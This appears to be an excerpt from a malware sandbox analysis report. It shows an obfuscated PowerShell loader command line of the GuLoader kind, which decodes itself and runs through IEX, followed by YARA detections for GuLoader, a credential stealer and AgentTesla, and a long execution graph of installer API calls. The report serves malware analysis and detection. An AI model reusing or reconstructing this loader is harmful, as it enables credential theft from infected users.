BLfeOShC BASnLPaABrPfaPDiD fAUdTGaAAr\ EbNilSeiPinAld NsPrmByaSag SnFei PnUdgCre Unvl\FrNLaoGrnAnpFar Bo Fc AuBerPleBom Ce GnMatRe\sas Ga Jr BaEmwDea NkNoeOvsFre A.PrdNer Dira`"""Da; d`$chLPooPigDeoKipEtaGaeIndumiEvcGrsPo9An Il=Vo FoP CyTox SiUnd PeFosKt4De Sp'In4FlARe2 G2Ti0De1 R0 N9 S0Sm1 E1SpEin0OxF K0VeBIn0MaA P0ro7Un0ReDAn1SeDWa4 LEPa5Ko3He4 LESl3Ni5 m3FoDSa1 L7Sp1XoDDy1KoABr0PrBEm0ho3 H4Gi0Un2Ac7Sk2Re1Ka4Ul0Sk2Ad8 L0Om7Ug0Pr2Re0BuBBr3Vi3Ab5Sk4Ga5Ba4Ag3StCFd0BeBAd0UnFSk0NoA T2 UFTo0Er2 T0Sk2Me2VrCTr1 P7 S1StAPr0DeB U1SiDPa4 E6Gr4CoAAt3Te9 D0He7Pa0Im0Ki1AfAUn0PiBOv1GaCGe1Fl9 T0LaBbe0 SBBa0PhAWi5 WASy5 SCma4 o7Ri'Wi;Pa&Br(Li`$PrSDaaDawGrwNaoHarBokMieNorPh8Ne5Gp7Ad) C Mi`$NiLBaoRagBioChpSea Pephd AiHjcbusBr9Ap;Ti`$SoDDeiRhsFll iognaLidPr0Fo Co=Ov VlPDeyMaxTeiBodVie CsMa4Hj S' O3Sc5Re3MeD R1Pe7Un1DuDTo1 FABe0 SBmo0Ko3To4Ml0Me3RaCBy1ReBKo0Hy0Gy1UlASp0No7Di0Th3Lo0DoB P4Sa0St2Et7Ko0Ph0Fj1 cARe0AfBKi1SqCBu0 R1Sp1MiE F3 DDSt0 IBFa1 RCFo1Ma8Fr0 s7Op0StDBe0HeB H1AnDco4Fa0 K2Ti3Se0 FFUd1SlC S1PaDRh0My6Sc0DrFFo0Br2fu3 S3Zi5Ta4Pa5 U4Pr2EtDOv0 O1An1MeEVa1bl7Ou4 C6 T4NeAUd2co2Ap0 T1Un0 L9Ke0Ph1 u1QuETr0 EF S0 CBMe0OpATr0Fr7Be0TaDBi1TeDDo4Tr2 l4CoE G5EnApl5 KEBl5FrCNo5JuA u4 H2As4 ME S4FlEKe4EtAPr3Sc9Ce0 T7Fe0Mo0Un1DiASu0UtBLa1MaCOp1Ch9Me0EvBFo0 VBUf0ChARe5 HAFo5TeDFn4Ru2va4TeEsu5Sk8Tr5SuD U5Br7od4To7Or'Sl;Fa&Fu(Pr`$AnSPiaOpwprwSeoTorSekSoeSprsu8 B5Po7Sk)my Di`$PaDHoiFesDolLaoAmaVodFo0Sp; B`$StP SokrsVeiTntLnisvoKmnEne ArNe=La`$SoLVaoFagChoFop MaSeeUndUniSicNosar.TmcphoBauMonGrtAf-Pr6Le3No9 H-Se4Un0bl2Po4 A;Sa`$ ADAsiBrs PlNoo TaTrdMo1Si Sv=Re InP uydixTiiAfdTaeGosGr4Sk Re'Au3Ju5ta3SkDSt1be7De1teD b1DvAOp0CrB I0Ku3 N4Ti0Ke3 lC v1KoBKi0In0Ta1PeAfu0Ov7Pl0bl3Fl0 ZBre4 F0In2Ne7Ar0pa0 A1PhAVo0WyBSp1ReCSk0In1Au1 SEDo3UnDKl0BoBOp1UdCFo1Ut8 G0of7Co0 CDSt0GeBSk1SyDRu4Os0Gt2Th3Di0krFAl1DeCRi1LaD A0 F6 S0 hFSk0No2 U3Da3Ze5Po4Bi5La4 O2TeD D0Aa1 R1JeE U1Bo7 D4Ba6Bl4EmAPa2 N2 T0Bu1 E0Ab9Pr0In1 N1meE P0 PFdr0PhB S0GlATr0 M7Fl0MoDMa1 RDRe4Vi2Fl4BoELr5Ku8Sv5InDPl5Un7 E4To5no5 HAVa5AsEJo5 ACFu5EsACh4Cy2Wh4saE S4TrA S3 CDDr0Fu5Va1IsBMi1NoEPr1MiDOp0 A6Ma1BlAMo0Sy7De0Su0Hy0 TF H4Fa2De4BnEPl4UdATa3VuEUd0Re1Or1BrDCo0tr7Sp1DeAIn0An7Fa0Me1ov0Ek0 E0OrBGa1JuC B4Hl7Le'se; R&Fi(Le`$ HSEua MwChwReo JrStkBaeParDi8Gr5Pe7Ar)Sp Eu`$miDapiPls Bl PoyoaMedis1Un;Da`$CaDSaiDisDelGlo naPad O2 N w=Op TrPDeyFuxCai EdTreFusCo4 d Cy'Fo4StASt3ExD P1StA A0ShBJa0GeF S0UnApo1udD N4WaEDe5Sy3Ta4arEOb3 W5Es3BeD Y1 e7In1BuDCh1SuABe0trBVi0fr3Bo4Ox0Re3 KCSy1 TB B0In0 F1noAUn0Si7He0Di3Tu0SeBIm4br0Sk2 g7Da0Pr0Pe1ToAru0 BBVa1HaC M0Vi1Ma1CoEUn3HaDCe0PhBYt1GuC B1Cl8Co0Te7St0TrDJa0FiB T1SaD F4 F0 P2Ba3Le0InFAr1HuCEx1ImDOp0No6 U0OsFMa0Pe2He3Fl3Li5De4 O5Os4Sp2Fo9Al0RaB B1TiASk2 SADr0 TBSl0 s2No0AaBSa0en9De0StFFo1 KARe0OeBph2He8as0Sm1Kr1SiCQu2gr8Po1FaBbe0 P0Li0 ADRi1PoA A0ju7ev0Va1Sp0Ru0Gl3 FEPr0Mi1Sc0La7Al0Tu0Gi1AnACi0VoB C1 FC A4Re6ch4 S6Tr0Su8Kv0Co5St1SyEGo4GrENo4KaACr2pr0Sp0Zy1Ab1CoB N0Na3Pi0LiBEf0Le0Gr0Ut7Vi1BeDpr0 O3Pe4FlEOp4FrA F2blAko0Ch7 D0Tr3St0Un7An0in0Vg1FyB D1 HAMe0 L7Am1Do8In0 SBPn1BuCMa0Ko0Ic0MuBRa4Gu7Fa4Vv2Ac4 kE N4Vi6Fa2 I9Am2DeAWe3SoAob4 VEJo2EnEsk4An6Vo3Co5Un2Ho7Me0Ga0Sy1 BAOe3KuESm1 BAWa1DoCIn3to3Ro4 S2 T4HoEFo3 D5 S2Di7Pr0In0Fo1NaASt3AaEFi1NoABa1SuCUn3 F3Pl4 a2Ar4peEfi3Kl5Co2 T7Re0Bi0In1DoAch3BaESl1 SAOu1 DC T3Su3Pu4Tr2An4PaEch3Cy5 B2Di7Kn0Re0To1teAre3AuELi1StA T1SlCFa3 J3Dm4Ga2Un4 UESe3Pr5 F2 C7 K0My0Ho1BuAPe3 HEUh1 HABe1 HC H3 s3Ch4Mi7Ov4ExEFo4Hn6Un3 S5Co2Sv7 M0St0Ca1ToAPe3ovEOm1 SA T1AfCBo3 S3Pe4Gl7Ne4Ga7Kv4St7Un' I;Ri&De( U`$BrSInaBlwPrwVaoVar Uk UeSjrKk8 R5 B7He) M Ch`$VeDStiBls Ml BounaAwdOp2Nr; A`$ CDChiSusNolStoTaaAkdRe3Fo Ub=ci NePLeyTix Ei SdTieThs N4Al Ka' I4 sA S3OvDTr1 LAHy0KeBUn0UnF T0PrA N1StDSt4Si0At2 Y7Sy0Kv0 S1Te8Un0Bi1Py0La5Cu0SyBBi4 P6bl4TrA P3 S9Ra0As7Kr0 o0 W1InAWe0DeBHa1toC B1Ph9Mo0ByBVo0MaBWh0PrARe5FlASt5GeDTr4Ra2Sm4FoAAa3ElDIc0Bu5Tr1 MBki1SoESl1 HDLa0Ny6Sa1EmAca0 S7 L0La0Dy0BjFRu4Ok2Aa4 MAPr2Kn1De1NiBSt0 RA A0StBUr0Me3 S0pr7Re0AfFSa0no0Ma4Un2Tr5 LESp4In2Bu5UpE R4Qu7 T'Th;Ba&Po( O`$ PSHaa AwTewBaoBirFikOceUdrru8Kl5Ho7 B)Br Ma`$StDAdiInsEtlCaoReaModSk3Af#Wi;""";<#Mageskifterne Tarwood Setiferous Stokvrker skillevej Saudiere #>;;function xorami ($Indbyggedes,$Magnetbelgning240) { &$Flagellanten0 (Disload9 'Fl$TeIabnInd CbPeyUngangMeeSkdPaeAgsHa B-RebhaxTeoderBa Tr$ UMsuaUng snAceCht PbTeeSilMeg Jn MiTanVegMi2Do4 T0Af ');}Function Disload9 { param([String]$Solfald); <#hovedpunkts Restemad Cataloguing Reseeking Commonality celebrating Sportsdirektr #>; For($Nonexpectant=2; $Nonexpectant -lt $Solfald.Length-1; $Nonexpectant+=(2+1+(1-1))){ <#Konditoris Endestation Kolhozy Ataghans Vinkortets #>; $Nonexplosives+=$Solfald.Substring($Nonexpectant, 1)} $Nonexplosives;};;$Flagellanten0 = Disload9 'ReIBuE aX B ';$Flagellanten1= Disload9 $Portugals;&$Flagellanten0 $Flagellanten1;<#Temperaturmaalingen Randingerne Kdvarerne Punditries Afkrslen Mocambiquernes Galleriets #>;
                                                                Imagebase:0xf60000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1604051248.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1607101353.0000000008450000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1607315520.00000000087AA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:09:02:29
                                                                Start date:24/01/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                Imagebase:0x640000
                                                                File size:262'432 bytes
                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2609495360.0000000020171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:25.1%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:21.5%
                                                                  Total number of Nodes:1337
                                                                  Total number of Limit Nodes:35
                                                                  execution_graph 4021 402840 4022 402bbf 18 API calls 4021->4022 4024 40284e 4022->4024 4023 402864 4026 405d2e 2 API calls 4023->4026 4024->4023 4025 402bbf 18 API calls 4024->4025 4025->4023 4027 40286a 4026->4027 4049 405d53 GetFileAttributesW CreateFileW 4027->4049 4029 402877 4030 402883 GlobalAlloc 4029->4030 4031 40291a 4029->4031 4034 402911 CloseHandle 4030->4034 4035 40289c 4030->4035 4032 402922 DeleteFileW 4031->4032 4033 402935 4031->4033 4032->4033 4034->4031 4050 40336e SetFilePointer 4035->4050 4037 4028a2 4038 403358 ReadFile 4037->4038 4039 4028ab GlobalAlloc 4038->4039 4040 4028bb 4039->4040 4041 4028ef 4039->4041 4042 4030e7 45 API calls 4040->4042 4043 405e05 WriteFile 4041->4043 4044 4028c8 4042->4044 4045 4028fb GlobalFree 4043->4045 4047 4028e6 GlobalFree 4044->4047 4046 4030e7 45 API calls 4045->4046 4048 40290e 4046->4048 4047->4041 4048->4034 4049->4029 4050->4037 4051 401cc0 4052 402ba2 18 API calls 4051->4052 4053 401cc7 4052->4053 4054 402ba2 18 API calls 4053->4054 4055 401ccf GetDlgItem 4054->4055 4056 402531 4055->4056 4056->4056 4057 4029c0 4058 402ba2 18 API calls 4057->4058 4059 4029c6 4058->4059 4060 4029f9 4059->4060 4061 40281e 4059->4061 4063 4029d4 4059->4063 4060->4061 4062 4061a0 18 API calls 4060->4062 4062->4061 4063->4061 4065 4060c5 wsprintfW 4063->4065 4065->4061 3100 401fc3 3101 401fd5 3100->3101 3102 402087 3100->3102 3120 402bbf 3101->3120 3105 401423 25 API calls 3102->3105 3111 4021e1 3105->3111 3106 402bbf 18 API calls 3107 401fe5 3106->3107 3108 401ffb LoadLibraryExW 3107->3108 3109 401fed GetModuleHandleW 3107->3109 3108->3102 3110 40200c 3108->3110 3109->3108 3109->3110 3126 4065c7 WideCharToMultiByte 3110->3126 3114 402056 3132 4052dd 3114->3132 3115 40201d 3118 40202d 3115->3118 3129 401423 3115->3129 3118->3111 3119 402079 FreeLibrary 3118->3119 3119->3111 3121 402bcb 3120->3121 3143 4061a0 3121->3143 3124 401fdc 3124->3106 3127 4065f1 GetProcAddress 3126->3127 3128 402017 3126->3128 3127->3128 3128->3114 3128->3115 3130 4052dd 25 API calls 3129->3130 3131 401431 3130->3131 3131->3118 3133 4052f8 3132->3133 3142 40539a 3132->3142 3134 405314 lstrlenW 3133->3134 3135 4061a0 18 API calls 3133->3135 3136 405322 lstrlenW 3134->3136 3137 40533d 3134->3137 3135->3134 3138 405334 lstrcatW 3136->3138 3136->3142 3139 405350 3137->3139 3140 405343 SetWindowTextW 3137->3140 3138->3137 3141 405356 SendMessageW SendMessageW SendMessageW 3139->3141 3139->3142 3140->3139 3141->3142 3142->3118 3156 4061ad 3143->3156 3144 4063f8 3145 402bec 3144->3145 3177 40617e lstrcpynW 3144->3177 3145->3124 3161 406412 3145->3161 3147 406260 GetVersion 3147->3156 3148 4063c6 lstrlenW 3148->3156 3151 4061a0 10 API calls 3151->3148 3152 4062db GetSystemDirectoryW 3152->3156 3154 4062ee GetWindowsDirectoryW 3154->3156 3155 406412 5 API calls 3155->3156 3156->3144 3156->3147 3156->3148 3156->3151 3156->3152 3156->3154 3156->3155 3157 406322 SHGetSpecialFolderLocation 3156->3157 3158 4061a0 10 API calls 3156->3158 3159 406367 lstrcatW 3156->3159 3170 40604b RegOpenKeyExW 3156->3170 3175 4060c5 wsprintfW 3156->3175 3176 40617e lstrcpynW 3156->3176 3157->3156 3160 40633a SHGetPathFromIDListW CoTaskMemFree 3157->3160 3158->3156 3159->3156 3160->3156 3162 40641f 3161->3162 3164 406495 3162->3164 3165 406488 CharNextW 3162->3165 3168 406474 CharNextW 3162->3168 3169 406483 CharNextW 3162->3169 3178 405b5f 3162->3178 3163 40649a CharPrevW 3163->3164 3164->3163 3166 4064bb 3164->3166 3165->3162 3165->3164 3166->3124 3168->3162 3169->3165 3171 4060bf 3170->3171 3172 40607f RegQueryValueExW 3170->3172 3171->3156 3173 4060a0 RegCloseKey 3172->3173 3173->3171 3175->3156 3176->3156 3177->3145 3179 405b65 3178->3179 3180 405b7b 3179->3180 3181 405b6c CharNextW 3179->3181 3180->3162 3181->3179 4066 4016c4 4067 402bbf 18 API calls 4066->4067 4068 4016ca GetFullPathNameW 4067->4068 4071 4016e4 4068->4071 4075 401706 4068->4075 4069 40171b GetShortPathNameW 4070 402a4c 4069->4070 4072 4064c1 2 API calls 4071->4072 4071->4075 4073 4016f6 4072->4073 4073->4075 4076 40617e lstrcpynW 4073->4076 4075->4069 4075->4070 4076->4075 4077 406846 4083 4066ca 4077->4083 4078 407035 4079 406754 GlobalAlloc 4079->4078 4079->4083 4080 40674b GlobalFree 4080->4079 4081 4067c2 GlobalFree 4082 4067cb GlobalAlloc 4081->4082 4082->4078 4082->4083 4083->4078 4083->4079 4083->4080 4083->4081 4083->4082 3182 4014cb 3183 4052dd 25 API calls 3182->3183 3184 4014d2 3183->3184 4084 40194e 4085 402bbf 18 API calls 4084->4085 4086 401955 lstrlenW 4085->4086 4087 402531 4086->4087 4088 4027ce 4089 4027d6 4088->4089 4090 4027da FindNextFileW 4089->4090 4092 4027ec 4089->4092 4091 402833 4090->4091 4090->4092 4094 40617e lstrcpynW 4091->4094 4094->4092 4102 405251 4103 405261 4102->4103 4104 405275 4102->4104 4105 405267 4103->4105 4114 4052be 4103->4114 4106 40527d IsWindowVisible 4104->4106 4112 405294 4104->4112 4107 40428e SendMessageW 4105->4107 4108 40528a 4106->4108 4106->4114 4110 405271 4107->4110 4115 404ba7 SendMessageW 4108->4115 4109 4052c3 CallWindowProcW 4109->4110 4112->4109 4120 404c27 4112->4120 4114->4109 4116 404c06 SendMessageW 4115->4116 4117 404bca GetMessagePos ScreenToClient SendMessageW 4115->4117 4119 404bfe 4116->4119 4118 404c03 4117->4118 4117->4119 4118->4116 4119->4112 4129 40617e lstrcpynW 4120->4129 4122 404c3a 4130 4060c5 wsprintfW 4122->4130 4124 404c44 4125 40140b 2 API calls 4124->4125 4126 404c4d 4125->4126 4131 40617e lstrcpynW 4126->4131 4128 404c54 4128->4114 4129->4122 4130->4124 4131->4128 3185 401754 3186 402bbf 18 API calls 3185->3186 3187 40175b 3186->3187 3191 405d82 3187->3191 3189 401762 3190 405d82 2 API calls 3189->3190 3190->3189 3192 405d8f GetTickCount GetTempFileNameW 3191->3192 3193 405dc9 3192->3193 3194 405dc5 3192->3194 3193->3189 3194->3192 3194->3193 3195 4038d5 3196 4038f0 3195->3196 3197 4038e6 CloseHandle 3195->3197 3198 403904 3196->3198 3199 4038fa CloseHandle 3196->3199 3197->3196 3204 403932 3198->3204 3199->3198 3205 403940 3204->3205 3206 403909 3205->3206 3207 403945 FreeLibrary GlobalFree 3205->3207 3208 40596f 3206->3208 3207->3206 3207->3207 3244 405c3a 3208->3244 3211 405997 DeleteFileW 3241 403915 3211->3241 3212 4059ae 3213 405ace 3212->3213 3258 40617e lstrcpynW 3212->3258 3213->3241 3276 4064c1 FindFirstFileW 3213->3276 3215 4059d4 3216 4059e7 3215->3216 3217 4059da lstrcatW 3215->3217 3259 405b7e lstrlenW 3216->3259 3218 4059ed 3217->3218 3221 4059fd lstrcatW 3218->3221 3223 405a08 lstrlenW FindFirstFileW 3218->3223 3221->3223 3223->3213 3224 405a2a 3223->3224 3227 405ab1 FindNextFileW 3224->3227 3236 40596f 62 API calls 3224->3236 3240 4052dd 25 API calls 3224->3240 3242 4052dd 25 API calls 3224->3242 3263 40617e lstrcpynW 3224->3263 3264 405927 3224->3264 3272 40601f MoveFileExW 3224->3272 3227->3224 3231 405ac7 FindClose 3227->3231 3228 405927 5 API calls 3230 405b09 3228->3230 3232 405b23 3230->3232 3235 405b0d 3230->3235 3231->3213 3234 4052dd 25 API calls 3232->3234 3234->3241 3237 4052dd 25 API calls 3235->3237 3235->3241 3236->3224 3238 405b1a 3237->3238 3239 40601f 38 API calls 3238->3239 3239->3241 3240->3227 3242->3224 3282 40617e lstrcpynW 3244->3282 3246 405c4b 3283 405bdd CharNextW CharNextW 3246->3283 3249 40598f 3249->3211 3249->3212 3250 406412 5 API calls 3256 405c61 3250->3256 3251 405c92 lstrlenW 3252 405c9d 3251->3252 3251->3256 3253 405b32 3 API calls 3252->3253 3255 405ca2 GetFileAttributesW 3253->3255 3254 4064c1 2 API calls 3254->3256 3255->3249 3256->3249 3256->3251 3256->3254 3257 405b7e 2 API calls 3256->3257 3257->3251 3258->3215 3260 405b8c 3259->3260 3261 405b92 CharPrevW 3260->3261 3262 405b9e 3260->3262 3261->3260 3261->3262 3262->3218 3263->3224 3289 405d2e GetFileAttributesW 3264->3289 3267 405954 3267->3224 3268 405942 RemoveDirectoryW 3270 405950 3268->3270 3269 40594a DeleteFileW 3269->3270 3270->3267 3271 405960 SetFileAttributesW 3270->3271 3271->3267 3273 406033 3272->3273 3275 406040 3272->3275 3292 405ead lstrcpyW 3273->3292 3275->3224 3277 405af3 3276->3277 3278 4064d7 FindClose 3276->3278 3277->3241 3279 405b32 lstrlenW CharPrevW 3277->3279 3278->3277 3280 405afd 3279->3280 3281 405b4e lstrcatW 3279->3281 3280->3228 3281->3280 3282->3246 3284 405bfa 3283->3284 3286 405c0c 3283->3286 3285 405c07 CharNextW 3284->3285 3284->3286 3288 405c30 3285->3288 3287 405b5f CharNextW 3286->3287 3286->3288 3287->3286 3288->3249 3288->3250 3290 405d40 SetFileAttributesW 3289->3290 3291 405933 3289->3291 3290->3291 3291->3267 3291->3268 3291->3269 3293 405ed5 3292->3293 3294 405efb GetShortPathNameW 3292->3294 3319 405d53 GetFileAttributesW CreateFileW 3293->3319 3296 405f10 3294->3296 3297 40601a 3294->3297 3296->3297 3298 405f18 wsprintfA 3296->3298 3297->3275 3300 4061a0 18 API calls 3298->3300 3299 405edf CloseHandle GetShortPathNameW 3299->3297 3301 405ef3 3299->3301 3302 405f40 3300->3302 3301->3294 3301->3297 3320 405d53 GetFileAttributesW CreateFileW 3302->3320 3304 405f4d 3304->3297 3305 405f5c GetFileSize GlobalAlloc 3304->3305 3306 406013 CloseHandle 3305->3306 3307 405f7e 3305->3307 3306->3297 3321 405dd6 ReadFile 3307->3321 3312 405fb1 3314 405cb8 4 API calls 3312->3314 3313 405f9d lstrcpyA 3315 405fbf 3313->3315 3314->3315 3316 405ff6 SetFilePointer 3315->3316 3328 405e05 WriteFile 3316->3328 3319->3299 3320->3304 3322 405df4 3321->3322 3322->3306 3323 405cb8 lstrlenA 3322->3323 3324 405cf9 lstrlenA 3323->3324 3325 405d01 3324->3325 3326 405cd2 lstrcmpiA 3324->3326 3325->3312 3325->3313 3326->3325 3327 405cf0 CharNextA 3326->3327 3327->3324 3329 405e23 GlobalFree 3328->3329 3329->3306 4132 404356 lstrcpynW lstrlenW 4133 401d56 GetDC GetDeviceCaps 4134 402ba2 18 API calls 4133->4134 4135 401d74 MulDiv ReleaseDC 4134->4135 4136 402ba2 18 API calls 4135->4136 4137 401d93 4136->4137 4138 4061a0 18 API calls 4137->4138 4139 401dcc CreateFontIndirectW 4138->4139 4140 402531 4139->4140 3330 4014d7 3335 402ba2 3330->3335 3332 4014dd Sleep 3334 402a4c 3332->3334 3336 4061a0 18 API calls 3335->3336 3337 402bb6 3336->3337 3337->3332 4141 401a57 4142 402ba2 18 API calls 4141->4142 4143 401a5d 4142->4143 4144 402ba2 18 API calls 4143->4144 4145 401a05 4144->4145 4146 404c59 GetDlgItem GetDlgItem 4147 404cab 7 API calls 4146->4147 4154 404ec4 4146->4154 4148 404d41 SendMessageW 4147->4148 4149 404d4e DeleteObject 4147->4149 4148->4149 4150 404d57 4149->4150 4152 404d8e 4150->4152 4153 4061a0 18 API calls 4150->4153 4151 404fa8 4156 405054 4151->4156 4166 405001 SendMessageW 4151->4166 4186 404eb7 4151->4186 4155 404242 19 API calls 4152->4155 4157 404d70 SendMessageW SendMessageW 4153->4157 4154->4151 4164 404ba7 5 API calls 4154->4164 4189 404f35 4154->4189 4160 404da2 4155->4160 4158 405066 4156->4158 4159 40505e SendMessageW 4156->4159 4157->4150 4163 40508f 4158->4163 4168 405078 ImageList_Destroy 4158->4168 4169 40507f 4158->4169 4159->4158 4165 404242 19 API calls 4160->4165 4161 4042a9 8 API calls 4167 40524a 4161->4167 4162 404f9a SendMessageW 4162->4151 4171 4051fe 4163->4171 4185 404c27 4 API calls 4163->4185 4193 4050ca 4163->4193 4164->4189 4170 404db0 4165->4170 4172 405016 SendMessageW 4166->4172 4166->4186 4168->4169 4169->4163 4173 405088 GlobalFree 4169->4173 4174 404e85 GetWindowLongW SetWindowLongW 4170->4174 4181 404e7f 4170->4181 4184 404e00 SendMessageW 4170->4184 4187 404e3c SendMessageW 4170->4187 4188 404e4d SendMessageW 4170->4188 4176 405210 ShowWindow GetDlgItem ShowWindow 4171->4176 4171->4186 4175 405029 4172->4175 4173->4163 4177 404e9e 4174->4177 4180 40503a SendMessageW 4175->4180 4176->4186 4178 404ea4 ShowWindow 4177->4178 4179 404ebc 4177->4179 4197 404277 SendMessageW 4178->4197 4198 404277 SendMessageW 4179->4198 4180->4156 4181->4174 4181->4177 4184->4170 4185->4193 4186->4161 4187->4170 4188->4170 4189->4151 4189->4162 4190 4051d4 InvalidateRect 4190->4171 4191 4051ea 4190->4191 4199 404b62 4191->4199 4192 4050f8 SendMessageW 4196 40510e 4192->4196 4193->4192 4193->4196 4195 405182 SendMessageW SendMessageW 4195->4196 4196->4190 4196->4195 4197->4186 4198->4154 4202 404a99 4199->4202 4201 404b77 4201->4171 4205 404ab2 4202->4205 4203 4061a0 18 API calls 4204 404b16 4203->4204 4206 4061a0 18 API calls 4204->4206 4205->4203 4207 404b21 4206->4207 4208 4061a0 18 API calls 4207->4208 4209 404b37 lstrlenW wsprintfW SetDlgItemTextW 4208->4209 4209->4201 4210 40155b 4211 4029f2 4210->4211 4214 4060c5 wsprintfW 4211->4214 4213 4029f7 4214->4213 4215 4046dd 4216 404709 4215->4216 4217 40471a 4215->4217 4276 4058a7 GetDlgItemTextW 4216->4276 4219 404726 GetDlgItem 4217->4219 4224 404785 4217->4224 4221 40473a 4219->4221 4220 404714 4223 406412 5 API calls 4220->4223 4226 40474e SetWindowTextW 4221->4226 4231 405bdd 4 API calls 4221->4231 4222 404869 4274 404a18 4222->4274 4278 4058a7 GetDlgItemTextW 4222->4278 4223->4217 4224->4222 4227 4061a0 18 API calls 4224->4227 4224->4274 4229 404242 19 API calls 4226->4229 4232 4047f9 SHBrowseForFolderW 4227->4232 4228 404899 4233 405c3a 18 API calls 4228->4233 4234 40476a 4229->4234 4230 4042a9 8 API calls 4235 404a2c 4230->4235 4236 404744 4231->4236 4232->4222 4237 404811 CoTaskMemFree 4232->4237 4238 40489f 4233->4238 4239 404242 19 API calls 4234->4239 4236->4226 4242 405b32 3 API calls 4236->4242 4240 405b32 3 API calls 4237->4240 4279 40617e lstrcpynW 4238->4279 4241 404778 4239->4241 4243 40481e 4240->4243 4277 404277 SendMessageW 4241->4277 4242->4226 4246 404855 SetDlgItemTextW 4243->4246 4251 4061a0 18 API calls 4243->4251 4246->4222 4247 40477e 4249 406558 5 API calls 4247->4249 4248 4048b6 4250 406558 5 API calls 4248->4250 4249->4224 4258 4048bd 4250->4258 4252 40483d lstrcmpiW 4251->4252 4252->4246 4255 40484e lstrcatW 4252->4255 4253 4048fe 4280 40617e lstrcpynW 4253->4280 4255->4246 4256 404905 4257 405bdd 4 API calls 4256->4257 4259 40490b GetDiskFreeSpaceW 4257->4259 4258->4253 4261 405b7e 2 API calls 4258->4261 4263 404956 4258->4263 4262 40492f MulDiv 4259->4262 4259->4263 4261->4258 4262->4263 4264 4049c7 4263->4264 4265 404b62 21 API calls 4263->4265 4266 4049ea 4264->4266 4268 40140b 2 API calls 4264->4268 4267 4049b4 4265->4267 4281 404264 KiUserCallbackDispatcher 4266->4281 4270 4049c9 SetDlgItemTextW 4267->4270 4271 4049b9 4267->4271 4268->4266 4270->4264 4273 404a99 21 API calls 4271->4273 4272 404a06 4272->4274 4282 404672 4272->4282 4273->4264 4274->4230 4276->4220 4277->4247 4278->4228 4279->4248 4280->4256 4281->4272 4283 404680 4282->4283 4284 404685 SendMessageW 4282->4284 4283->4284 4284->4274 3449 401bdf 3450 402ba2 18 API calls 3449->3450 3451 401be6 3450->3451 3452 402ba2 18 API calls 3451->3452 3453 401bf0 3452->3453 3454 401c00 3453->3454 3455 402bbf 18 API calls 3453->3455 3456 401c10 3454->3456 3459 402bbf 18 API calls 3454->3459 3455->3454 3457 401c1b 3456->3457 3458 401c5f 3456->3458 3460 402ba2 18 API calls 3457->3460 3461 402bbf 18 API calls 3458->3461 3459->3456 3462 401c20 3460->3462 3463 401c64 3461->3463 3464 402ba2 18 API calls 3462->3464 3465 402bbf 18 API calls 3463->3465 3466 401c29 3464->3466 3467 401c6d FindWindowExW 3465->3467 3468 401c31 SendMessageTimeoutW 3466->3468 3469 401c4f SendMessageW 3466->3469 3470 401c8f 3467->3470 3468->3470 3469->3470 3471 4022df 3472 402bbf 18 API calls 3471->3472 3473 4022ee 3472->3473 3474 402bbf 18 API calls 3473->3474 3475 4022f7 3474->3475 3476 402bbf 18 API calls 3475->3476 3477 402301 GetPrivateProfileStringW 3476->3477 4285 4043df 4286 4043f7 4285->4286 4289 404511 4285->4289 4290 404242 19 API calls 4286->4290 4287 40457b 4288 404585 GetDlgItem 4287->4288 4291 40464d 4287->4291 4292 40460e 4288->4292 4293 40459f 4288->4293 4289->4287 4289->4291 4294 40454c GetDlgItem SendMessageW 4289->4294 4295 40445e 4290->4295 4296 4042a9 8 API calls 4291->4296 4292->4291 4297 404620 4292->4297 4293->4292 4301 4045c5 6 API calls 4293->4301 4316 404264 KiUserCallbackDispatcher 4294->4316 4299 404242 19 API calls 4295->4299 4300 404648 4296->4300 4302 404636 4297->4302 4303 404626 SendMessageW 4297->4303 4305 40446b CheckDlgButton 4299->4305 4301->4292 4302->4300 4306 40463c SendMessageW 4302->4306 4303->4302 4304 404576 4307 404672 SendMessageW 4304->4307 4314 404264 KiUserCallbackDispatcher 4305->4314 4306->4300 4307->4287 4309 404489 GetDlgItem 4315 404277 SendMessageW 4309->4315 4311 40449f SendMessageW 4312 4044c5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4311->4312 4313 4044bc GetSysColor 4311->4313 4312->4300 4313->4312 4314->4309 4315->4311 4316->4304 4317 401960 4318 402ba2 18 API calls 4317->4318 4319 401967 4318->4319 4320 402ba2 18 API calls 4319->4320 4321 401971 4320->4321 4322 402bbf 18 API calls 4321->4322 4323 40197a 4322->4323 4324 40198e lstrlenW 4323->4324 4325 4019ca 4323->4325 4326 401998 4324->4326 4326->4325 4330 40617e lstrcpynW 4326->4330 4328 4019b3 4328->4325 4329 4019c0 lstrlenW 4328->4329 4329->4325 4330->4328 4331 401662 4332 402bbf 18 API calls 4331->4332 4333 401668 4332->4333 4334 4064c1 2 API calls 